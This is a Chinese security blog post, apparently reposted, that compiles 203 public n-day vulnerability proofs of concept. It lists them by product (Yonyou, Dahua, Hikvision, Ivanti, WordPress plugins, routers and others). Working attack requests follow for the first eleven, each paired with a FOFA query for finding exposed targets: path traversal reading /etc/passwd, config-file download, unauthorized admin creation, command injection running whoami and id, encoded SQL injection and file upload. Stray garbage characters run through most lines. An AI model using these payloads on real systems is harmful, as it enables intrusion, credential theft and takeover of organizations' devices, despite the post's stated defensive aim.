互联网公开漏洞整理202309-202406. d" j2 ~2 J* I: `8 H, e
道一安全 2024-06-05 07:41 北京
. J" ^) q- d( }2 C' K0 S以下文章来源于网络安全新视界 ,作者网络安全新视界8 R/ f8 V3 z. o5 {( P! k
0 F9 E& _7 B9 M2 E# `
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
! r6 }6 ?1 p1 m
, L! I8 ?, h: _$ f& }2 b( h漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。2 ~+ O4 b- o1 A( M3 y) _
- C, J9 u. |+ B" b1 e安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。3 I; K+ v# F+ w& M
/ l% q' U* S% l3 ^3 A( d+ F
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
& F4 g" P/ j$ \$ w0 L. |0 s$ {# @ c
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。: X* A5 Q- h* T7 N
2 v9 v3 K6 ?( t- N& [! U( B9 \1 B ]( N) [( t x @5 z
声明
& J, N0 S% h5 H, W8 i& ^
& `4 D8 U9 Z3 w( F为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。: O/ }& P( \; k( T) M- r! D
5 G" T F. @1 X" T( ^1 z- w a
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。 `2 f: R* X& B: U# Q% {
! }% x% R$ Y: ?9 v' J4 H9 T$ O
5 V6 ~" w, p- |1 B9 S* o$ p1 q
* S+ m# C1 P& o1 q2 m目录
- c' I& g/ n1 c- [: |0 G& p2 }9 b& b6 T
01# L/ l) c$ s( ~; Q
' M6 j+ o8 V+ `* j% X1. StarRocks MPP数据库未授权访问
X( F$ O$ a" N Z9 B2. Casdoor系统static任意文件读取2 v+ h: X) C. v* P; q, A5 k6 |
3. EasyCVR智能边缘网关 userlist 信息泄漏# ?1 P& I6 D3 O' g
4. EasyCVR视频管理平台存在任意用户添加
' z8 C; G$ D( z) |9 \5. NUUO NVR 视频存储管理设备远程命令执行+ ^( Z9 o. v4 g6 `
6. 深信服 NGAF 任意文件读取9 C% K/ o* A {2 G( N! T: T: p
7. 鸿运主动安全监控云平台任意文件下载
- P/ }" }' V2 t' p( S1 Z/ d8. 斐讯 Phicomm 路由器RCE: f% j1 V" q9 X
9. 稻壳CMS keyword 未授权SQL注入9 q! b7 G4 c! N* U6 o
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
0 X/ ^* a# h3 r5 A' n8 S3 D) V8 Y11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
$ r6 t6 v, l7 r5 y/ C12. Jorani < 1.0.2 远程命令执行, S% [6 |6 e- p- R/ y
13. 红帆iOffice ioFileDown任意文件读取1 E, x5 ]7 v# K1 M0 N
14. 华夏ERP(jshERP)敏感信息泄露
4 k! C5 X7 J" k1 V15. 华夏ERP getAllList信息泄露) z" n2 j9 P- S9 O
16. 红帆HFOffice医微云SQL注入
0 C0 K) ?7 ?3 q5 B E17. 大华 DSS itcBulletin SQL 注入
* ^$ x1 l J: a18. 大华 DSS 数字监控系统 user_edit.action 信息泄露% B0 s8 M! M/ j
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入+ t$ R3 u! B( F% }
20. 大华ICC智能物联综合管理平台任意文件读取
: _) Z) I. t6 g6 ~( S8 z21. 大华ICC智能物联综合管理平台random远程代码执行
# M) \2 E! ^" q% z( S& q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
V# }+ t" F$ b# }: E* \' g! U7 ^: [ ?23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ t ^7 g4 E! B24. 用友NC 6.5 accept.jsp任意文件上传2 `2 e9 y7 W0 Q+ B
25. 用友NC registerServlet JNDI 远程代码执行% i9 M9 G$ ?% a& s, \
26. 用友NC linkVoucher SQL注入# ?- i8 t j1 A7 z
27. 用友 NC showcontent SQL注入
' Z/ h( _8 j1 g0 s6 Z* V28. 用友NC grouptemplet 任意文件上传
" A( N, G+ ?% s( z29. 用友NC down/bill SQL注入( m) h0 m( x, f6 P6 f: R- E9 F$ E
30. 用友NC importPml SQL注入
1 j1 g) \# h. D- S$ s: y7 w+ H3 D31. 用友NC runStateServlet SQL注入" ~3 i7 e7 c0 y0 ^
32. 用友NC complainbilldetail SQL注入' R7 }" V) l( T; H# A- q* e: p$ w
33. 用友NC downTax/download SQL注入( |) u& [ e' `9 y2 y& P
34. 用友NC warningDetailInfo接口SQL注入
9 N* R4 c8 b2 V35. 用友NC-Cloud importhttpscer任意文件上传* [9 Y) [0 y. Z+ G
36. 用友NC-Cloud soapFormat XXE! L, V1 q; G6 _0 Y! V. x
37. 用友NC-Cloud IUpdateService XXE
) W" a& O1 R: |' _, Q$ I8 a' p38. 用友U8 Cloud smartweb2.RPC.d XXE2 e% P {4 K6 K N
39. 用友U8 Cloud RegisterServlet SQL注入
' @ y' f, M8 J0 `5 s. p40. 用友U8-Cloud XChangeServlet XXE
' O: r& E2 e+ x: J/ \2 r41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 g0 z0 e5 |' [' \% l0 Z0 C' O42. 用友GRP-U8 SmartUpload01 文件上传5 F! u8 ]4 }+ P; W( e, ~7 M) c
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 q4 x. u* a/ k n# G! e) G: }% I
44. 用友GRP-U8 bx_dj_check.jsp SQL注入: d6 e$ t1 d6 K I/ a, F) |9 P
45. 用友GRP-U8 ufgovbank XXE
, v" F/ d1 @6 d( H$ @46. 用友GRP-U8 sqcxIndex.jsp SQL注入
' y& c3 V! ?- L, p" Q4 |47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 O, f- i2 e& v7 Q1 V0 q# X$ c48. 用友U8 CRM swfupload 任意文件上传+ s; H C% F3 E- d3 V) M G2 \/ S
49. 用友U8 CRM系统uploadfile.php接口任意文件上传% {$ f! y: B6 C' e- k* G( V
50. QDocs Smart School 6.4.1 filterRecords SQL注入! t' ^- J( ^# }
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
7 ]( K2 s$ r5 d52. 泛微E-Office json_common.php sql注入/ _8 K5 L; h4 o; D4 _: n
53. 迪普 DPTech VPN Service 任意文件上传- q3 s4 i; X \" F: w( _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行- |7 O$ [; R7 A; G+ L! P/ m
55. 畅捷通T+ getdecallusers信息泄露$ M) Q! d4 x( `$ n) {; n- P
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ D3 D3 }' S! U% y, S57. 畅捷通T+ keyEdit.aspx SQL注入
" |2 E" x; G! z2 v5 ]$ m. L58. 畅捷通T+ KeyInfoList.aspx sql注入
+ i$ n5 p! r, v, N) O/ L' X59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行0 r- W* j a5 B$ K7 O
60. 百卓Smart管理平台 importexport.php SQL注入
8 a L) H/ u4 y/ ?0 c; k# I2 J61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 `. a& t. O" U& C; h% k
62. IP-guard WebServer 远程命令执行
! A. {: |- a/ I" z% F0 m- I3 N63. IP-guard WebServer任意文件读取
$ J& p- l! i/ B5 Q64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) p D! K; q) C6 P65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# c7 [3 [/ K7 F) v1 l* l2 c66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
) O# j- a5 K- _4 J9 U4 Q' O67. 万户ezOFFICE wpsservlet任意文件上传
, |5 }1 M( F& Y. [- g( c0 O68. 万户ezOFFICE wf_printnum.jsp SQL注入1 V3 Q$ x8 y, g. |* A2 ?
69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ x+ e$ Z" n. }8 A- g8 }70. 万户ezEIP success 命令执行
7 g& T" q k6 P$ H) z. M71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
6 s5 E( C" o% }3 ^) ?+ m* U2 w! O72. 致远OA getAjaxDataServlet XXE
& c. E) n$ y9 x0 o# n5 F73. GeoServer wms远程代码执行# Z' s: \' y' o7 _8 u6 W6 P# R% N
74. 致远M3-server 6_1sp1 反序列化RCE
9 q6 T' P. H0 M0 ^6 M/ l( t: j75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" D, y: B+ \$ k; i! ]4 Y1 N! f- d6 I
76. 新开普掌上校园服务管理平台service.action远程命令执行
7 s+ K1 w' \+ h+ B# {+ E77. F22服装管理软件系统UploadHandler.ashx任意文件上传! [; n- f! r0 F% Q6 W3 S
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
: G3 C; ^' [ E4 a79. BYTEVALUE 百为流控路由器远程命令执行: r! {$ x: S3 w2 A, b9 U3 S
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传3 `/ [# c) z+ |# t- h
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 D$ g r- f5 R, `: }* t; c6 E
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
2 Y) a5 L2 b( G0 U! H2 I; K' A83. JeecgBoot testConnection 远程命令执行
1 W5 c! }5 }% k$ v% L' D$ x84. Jeecg-Boot JimuReport queryFieldBySql 模板注入5 Y* N0 L) Z: C0 Q, ?
85. SysAid On-premise< 23.3.36远程代码执行
" U8 j `. D* x& m86. 日本tosei自助洗衣机RCE* G9 l, s6 \9 R k; j* G
87. 安恒明御安全网关aaa_local_web_preview文件上传
% o1 B o! S* }. W$ G88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% s6 M1 v/ M, h4 A
89. 致远互联FE协作办公平台editflow_manager存在sql注入
8 i0 j! \$ |' m# F% ^90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) o' _2 h: Z$ |* e% D+ E91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( q# k, y- f. B! ?. U& e92. 海康威视运行管理中心session命令执行5 o- `' G% h9 V5 \& B* x
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传+ H! F# p+ {. a# g- p% J: G, H3 m
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% S" R! V/ N1 k; \95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% k$ @; @* z% p: F: c" c
96. Apache OFBiz 18.12.11 groovy 远程代码执行
: @3 y, h$ V; j: B) I97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
& O& }, Z- a2 [. K% Y98. SpiderFlow爬虫平台远程命令执行
! |3 \* r5 O) n! @99. Ncast盈可视高清智能录播系统busiFacade RCE
3 J, B, S2 a% e$ W w* i2 b% T100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 n6 R% x5 y( y. T& ]* c2 n
101. ivanti policy secure-22.6命令注入
% {& ^9 y5 \* K4 J+ R6 c102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
) S! q" \. [" I5 p! v2 Q7 E+ z. v# d103. Ivanti Pulse Connect Secure VPN XXE
& x: c9 h. d' Z/ E104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
8 b: d" o. s) h8 C! k3 `7 |105. SpringBlade v3.2.0 export-user SQL 注入2 p+ E3 C+ P( a- N# ^' E f# K
106. SpringBlade dict-biz/list SQL 注入% j8 c- M& j# T, N( R% R4 Q) Y
107. SpringBlade tenant/list SQL 注入/ c/ k8 w" l& u5 h2 f* ~( A
108. D-Tale 3.9.0 SSRF* }0 k6 O/ p7 v. g' b
109. Jenkins CLI 任意文件读取
# l( j: r2 F( V110. Goanywhere MFT 未授权创建管理员" j+ C1 L T, h* P, Y
111. WordPress Plugin HTML5 Video Player SQL注入1 m9 u- M* s4 S& a2 D
112. WordPress Plugin NotificationX SQL 注入6 ^6 Z6 X* M; L
113. WordPress Automatic 插件任意文件下载和SSRF) F! _7 D9 Y6 V1 _% p: y
114. WordPress MasterStudy LMS插件 SQL注入+ k9 ?" \# M% Z: @2 a
115. WordPress Bricks Builder <= 1.9.6 RCE
% F8 Z5 X/ u" l116. wordpress js-support-ticket文件上传* F4 m/ Y8 {$ Q( X$ I) a5 R5 p
117. WordPress LayerSlider插件SQL注入
: H) [8 q' P/ p1 ~8 }118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ f, W9 z2 R4 u% l. \6 i
119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 Y, A7 n u: i+ K: u1 b6 S" a120. 北京百绰智能S40管理平台导入web.php任意文件上传
' N# \6 `: j# F; V+ T& Y121. 北京百绰智能S42管理平台userattestation.php任意文件上传% b% d% g+ r3 K+ @ G* @4 @4 E
122. 北京百绰智能s200管理平台/importexport.php sql注入 R P p& d8 }3 O
123. Atlassian Confluence 模板注入代码执行9 {9 z3 E# j) E
124. 湖南建研工程质量检测系统任意文件上传
/ s$ l7 h& ~7 g0 C8 j2 X, W$ i125. ConnectWise ScreenConnect身份验证绕过
$ s0 v) C. k6 Q4 T3 s126. Aiohttp 路径遍历$ k! M& | g# e/ I
127. 广联达Linkworks DataExchange.ashx XXE( D" R. R9 G" S' `
128. Adobe ColdFusion 反序列化" I1 Q: b Z2 F& O" Z5 s
129. Adobe ColdFusion 任意文件读取4 g; s, H/ Q' c# e: n& t) O
130. Laykefu客服系统任意文件上传
9 f4 Z# ~8 ^: L5 A' `+ C6 [3 @131. Mini-Tmall <=20231017 SQL注入2 N | S7 @' |3 w' H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, |5 e) y N/ w5 H
133. H5 云商城 file.php 文件上传' f! u- }8 C: L- U! ]7 \- z7 h3 |9 J- H
134. 网康NS-ASG应用安全网关index.php sql注入
+ ^. M, @; K7 B! h4 H135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& |/ \2 v2 M4 q: |2 s
136. NextChat cors SSRF
+ H, Y' y: T, n4 d2 f* y5 r137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 I) A5 }: x7 ^3 Y1 a138. 福建科立讯通信指挥调度平台pwd_update.php sql注入: r9 v0 M1 ]3 z/ l( `
139. 福建科立讯通信指挥调度平台editemedia.php sql注入# W% `) q5 {) N0 x: {: r% ]% l
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: @2 K% P% k1 g/ b
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
Q# n* E8 u; f8 L$ m142. CMSV6车辆监控平台系统中存在弱密码
9 Z3 J+ `. o0 X1 T143. Netis WF2780 v2.1.40144 远程命令执行/ H# z+ Y0 a' d
144. D-Link nas_sharing.cgi 命令注入) o, i( Q9 E/ y- }3 E' J9 `
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
+ C' P) }# q# I" ^( g1 g146. MajorDoMo thumb.php 未授权远程代码执行
# B# { q7 u7 b t+ k$ t, s& C147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
" X* j' U) z$ G148. CrushFTP 认证绕过模板注入
' B0 [4 [% X6 V* X149. AJ-Report开源数据大屏存在远程命令执行1 F/ i; C9 W, R" a4 h h- J1 [ J* e
150. AJ-Report 1.4.0 认证绕过与远程代码执行
. S' w5 J6 {" r151. AJ-Report 1.4.1 pageList sql注入* @3 ]# b$ ]3 T: L. c
152. Progress Kemp LoadMaster 远程命令执行
" W! j3 g8 K% P# o153. gradio任意文件读取
0 H* m5 Z- i. B6 G5 Z$ p154. 天维尔消防救援作战调度平台 SQL注入
1 D6 s \+ ^/ u- w/ p9 v155. 六零导航页 file.php 任意文件上传. w4 b# ] y9 X9 l( ?% [ k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
, E0 n4 M3 @# a: u7 h' P* z157. 美特CRM upload.jsp 任意文件上传: T- I4 o: G2 ~3 L
158. Mura-CMS-processAsyncObject存在SQL注入6 S; L0 B7 C3 v
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
. g. ?+ B8 G% b) A160. Sonatype Nexus Repository 3目录遍历与文件读取9 w o% R* ?& O% v" k8 d% d3 a1 V( l
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 X# q& y+ l' r( x# A
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传/ W2 K# `$ R; z$ R
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. s+ B) O5 F) \$ ?/ b- ?( ~4 s
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传, }$ x# h' ~3 G
165. OrangeHRM 3.3.3 SQL 注入
8 C4 g- e1 S j0 H: K% p9 @166. 中成科信票务管理平台SeatMapHandler SQL注入5 {! L- V% h4 |1 l. W; }9 `
167. 精益价值管理系统 DownLoad.aspx任意文件读取
1 Q! \8 l, a) E# F# G. Q2 X8 }168. 宏景EHR OutputCode 任意文件读取
3 W9 v0 z- R" P, B0 _169. 宏景EHR downlawbase SQL注入( i3 s/ c( [1 i: ]1 r- n+ }
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 }4 r0 p* a9 t$ n* B. s. U171. 通天星CMSV6车载定位监控平台 SQL注入* I0 v6 h# J7 z+ a# @" X$ ~
172. DT-高清车牌识别摄像机任意文件读取
# G# O. Y- l# n; a- x) _) y5 l7 S) ~173. Check Point 安全网关任意文件读取& X3 h1 B0 S% t+ Z
174. 金和OA C6 FileDownLoad.aspx 任意文件读取4 G5 Y& g: j" V8 D
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入7 {6 P, A7 h! @& F( N8 U! c
176. 电信网关配置管理系统 rewrite.php 文件上传
( H! W' O) Z& L1 K% O177. H3C路由器敏感信息泄露
: F) H$ F7 p" s# z178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ S1 r4 F' ^2 Z. N' `+ V: L V
179. 建文工程管理系统存在任意文件读取, y- O* }0 w9 O& X& Z
180. 帮管客 CRM jiliyu SQL注入
( ~9 k& r! `" \! z+ ~3 @181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
" u8 \) M! } W& R182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, r5 A: l0 A' H4 E7 U. r* o% J6 E183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入6 g5 r0 c1 m5 z1 P/ R K
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
+ q5 ]5 x1 V p3 q9 f1 W185. 瑞友天翼应用虚拟化系统SQL注入2 y8 `9 w$ R9 g1 D" d7 X- M/ B' z
186. F-logic DataCube3 SQL注入# @* f L8 a$ S) l( x" b
187. Mura CMS processAsyncObject SQL注入* G$ c" v+ l% G5 ~9 Q: `
188. 叁体-佳会视频会议 attachment 任意文件读取
3 l! Q) A1 ?' Y189. 蓝网科技临床浏览系统 deleteStudy SQL注入4 ]+ x# o0 |% U: K' R/ |' x
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
" B* c. b! n; F m& `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 y) i M4 C! e6 U
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ M6 M: K) c' G" i193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
5 M, f" d, e8 Q0 ^. K194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
5 A* v( q7 }: [195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 _% O; R% R/ _6 _# }
196. 河南省风速科技统一认证平台密码重置
9 O- J# a, m! D! t9 t* B3 V. I4 j197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入# k% v' ]1 K# c
198. 阿里云盘 WebDAV 命令注入2 Q5 [! `) G U% p& V9 f# X
199. cockpit系统assetsmanager_upload接口 文件上传
: R$ Z' z/ q9 x d6 u* I g200. SeaCMS海洋影视管理系统dmku SQL注入
8 [# P% m Z% X) o5 ~201. 方正全媒体新闻采编系统 binary SQL注入6 o# V+ c) v7 t. E0 D: V
202. 微擎系统 AccountEdit任意文件上传: T+ |$ ]5 {8 q4 Y' r
203. 红海云EHR PtFjk 文件上传: z7 G+ y* i9 |, K! f
/ t+ V% d+ E3 `3 {, CPOC列表
; y; k, ?) j' r# }9 J/ D
6 D! n& A! p& s8 x. ?02$ z, l& D! X( q9 P' V: E; G% q
# `$ N6 A3 a, E$ d' {9 c, h1. StarRocks MPP数据库未授权访问2 ^, W' g* c+ T, y2 _% H, m
FOFA :title="StarRocks"' ~: j3 v2 f! t8 Y a+ V$ h2 e; M
GET /mem_tracker HTTP/1.1
^& w( V# G5 Z/ Y. l/ F9 oHost: URL
2 ^9 R9 c0 e5 G& r# a e4 l; p; Z8 p' b. W( _
4 v6 m8 `# ~: g* a
2. Casdoor系统static任意文件读取% l9 C8 U! r* i- W0 q
FOFA :title="Casdoor" o4 T" u! E. { U9 Z
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
# T% { P' U; IHost: xx.xx.xx.xx:9999
* s$ n+ A: H( [5 Y% ]2 W& VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) L+ w3 @- }/ q/ [Connection: close
' ^+ L2 U2 F9 ?" y" P1 IAccept: */*0 x! T; y! j F" C) p1 \" I, H
Accept-Language: en
# d4 x( P# m$ B, L, D0 WAccept-Encoding: gzip9 M3 W c/ C& b( s6 M) m+ Z5 _( q8 ?
5 X) A4 R* y" b
( z+ b. Q: X1 C4 K! d! q3. EasyCVR智能边缘网关 userlist 信息泄漏/ [6 F* u1 R7 E
FOFA :title="EasyCVR"6 ^- p& ]% G, ?8 Z
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
( R* e2 t5 Z# jHost: xx.xx.xx.xx
+ ^- w Q/ ~& `. O' |; N) K+ a6 L+ t* N
% ^2 p+ @# N, t
4. EasyCVR视频管理平台存在任意用户添加) z0 A7 s4 P! z3 V
FOFA :title="EasyCVR"' P t8 n+ Y* v) S2 U
7 |" h* i+ V$ Y( }: z+ W
password更改为自己的密码md50 {4 V+ ^ `, [2 T8 S x% s
POST /api/v1/adduser HTTP/1.1% C' s7 `0 `* O( R8 j3 Q/ x
Host: your-ip3 C+ }# n/ y1 J" @% N
Content-Type: application/x-www-form-urlencoded; charset=UTF-8! W) N' O- `5 ~
; g# Q0 y8 V+ `- y% Z) X
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
1 B) `' o* C2 i: s) [9 a" Q- W, ]6 V y; t I8 b( w
% W) g5 H) q4 B* C% \
5. NUUO NVR 视频存储管理设备远程命令执行) t/ y- c0 ~# ^, s% d
FOFA:title="Network Video Recorder Login". D3 A3 E9 s1 ]% X1 N6 G
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.14 E0 c) ~) T* m8 F1 q' ^; ?/ Z
Host: xx.xx.xx.xx/ q4 l- X7 T& H: Z( L% e5 E
0 i2 \* m m8 j# U4 n; g) \
+ D$ L6 C" D d3 K% V8 K3 D* x6. 深信服 NGAF 任意文件读取; K$ ]( [7 n, q1 w
FOFA:title="SANGFOR | NGAF"
0 U8 n! z9 K0 hGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
- n; s ~- n5 c. a' n a1 FHost:
+ [& O8 [9 x% D. H1 G$ {
5 w! q2 a/ c, y
( z' Q0 w1 n. v7. 鸿运主动安全监控云平台任意文件下载& R: H7 r* }5 s' }* x
FOFA:body="./open/webApi.html"% s" ?5 K4 b. L: ~: i0 V) L
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
/ X. e$ Y: c$ C+ l. K! V9 sHost:3 y& m5 {: E, g% n; x
/ |# T) O/ k0 U& c8 Y( [' d5 z: R) W/ I( e m
8. 斐讯 Phicomm 路由器RCE' p1 C! a% D- v- y
FOFA:icon_hash="-1344736688"' O+ }. @3 |: g, G) k
默认账号admin登录后台后,执行操作+ d" h) T8 u5 Q
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ n2 w- u/ d# T/ G7 N' @4 k- ?1 bHost: x.x.x.x8 t( [, l& A9 l$ x1 a% A7 v
Cookie: sysauth=第一步登录获取的cookie/ c0 K' ]2 q, B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
7 t; y. C, {6 K6 K; uUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36! t# f4 h. i) c2 u( w% \( F
$ ~( _$ e9 M* q' `
------WebKitFormBoundaryxbgjoytz
! {+ C+ D5 @+ D EContent-Disposition: form-data; name="wifiRebootEnablestatus"6 q7 g+ p p8 q6 p3 p3 g
8 _, H. @: F2 Q9 U
%s: s8 s0 t% q# I* q: }' I
------WebKitFormBoundaryxbgjoytz
9 N/ ?, p4 ^0 [. i9 [; X. ~" o8 ^ W* MContent-Disposition: form-data; name="wifiRebootrange"8 w; ]$ M) i) I% ?1 a8 w$ V! ?
2 I9 X5 Y% Y) p( |3 N, F12:00; id;! K' @( N5 u! b# p, Y' [) R
------WebKitFormBoundaryxbgjoytz
/ J7 _& o3 a4 b' n0 XContent-Disposition: form-data; name="wifiRebootendrange"- B' |% I8 z: Y3 s) G1 I" S
; ?$ f3 b1 [8 t* d f ]$ B* C%s:: z# Z, m; l2 n
------WebKitFormBoundaryxbgjoytz; c4 k4 ~. {! P1 O, Z9 H* P
Content-Disposition: form-data; name="cururl2"6 A% K7 x1 {, S" ~
8 M7 L5 P% [- J0 K" v
- e) m9 r/ b5 i9 y# p------WebKitFormBoundaryxbgjoytz--
3 r3 L, P w- d
* @; ~" N' }9 _7 Y* F. i/ w& \( Q: E1 Q. F7 B
9. 稻壳CMS keyword 未授权SQL注入+ A# e ]: e b, K. a# a! ^/ h/ H- ~
FOFA:app="Doccms"
- d8 d* @% F- J4 z8 k. Y9 WGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.10 `( V$ ?' w4 a* u! Y/ f
Host: x.x.x.x2 `7 j) J# M6 c. ]4 I
" x, s0 K( c3 \( h Q
" k& q% t& w; f% D, Lpayload为下列语句的二次Url编码' p3 l+ c+ r. m+ T. a: \) g
+ N$ o7 c4 @( ~, x9 g0 z' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# t$ G2 g' ^3 o7 r$ }5 Y& q! Y
; j' B; O; ~9 P2 e: X8 }" J! B10. 蓝凌EIS智慧协同平台api.aspx任意文件上传1 v0 Z; t$ [; O$ a
FOFA:icon_hash="953405444"
8 S8 G0 q3 G0 g+ U9 ~8 {! } M9 o+ l
文件上传后响应中包含上传文件的路径
! U7 s2 N+ m o: ?POST /eis/service/api.aspx?action=saveImg HTTP/1.1
! `/ ?. W! q1 \% U3 g h; D8 lHost: x.x.x.x:xx- D. O# w% B6 R2 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.360 l0 O, x- c9 D' c; m
Content-Length: 197$ x% u' i2 r3 L: Y7 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 }* u( X- r( u% H
Accept-Encoding: gzip, deflate
) O! L# u/ w1 |) e0 DAccept-Language: zh-CN,zh;q=0.9# ]/ B- x; n( B2 f- v
Connection: close
2 j8 H* G! v4 E D. FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu$ \# o" c6 f; T: r& Z! S) c3 y/ y
^% `& N& c3 K6 x2 Y------WebKitFormBoundaryxdgaqmqu/ c7 J8 L( N# z- ]) `0 _% U
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
5 ]/ S- [8 i& X; w- c/ V( ^" LContent-Type: text/html. v5 n5 G! ~( |; b
9 |: ~( @% g* Z; v: x5 f; _ A/ D
jmnqjfdsupxgfidopeixbgsxbf
5 e4 ]# E. E7 D# `+ Y* M------WebKitFormBoundaryxdgaqmqu-- Z0 a- q/ S/ m. m/ r
7 x7 L0 B, ^5 ~# y; _5 a) L1 k, I/ r; G4 m1 x" n2 |; I
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
) \8 x9 V* L! t7 w& GFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
- D0 H! R. Z; pGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1$ x" P, [0 f2 s' c" k
Host: 127.0.0.1
! B, ]8 \' E% s& UPragma: no-cache+ ]( v5 ]3 ]/ j: M0 H0 b* r: n, I- ^
Cache-Control: no-cache8 k( v3 Z. ?9 ?6 l
Upgrade-Insecure-Requests: 1
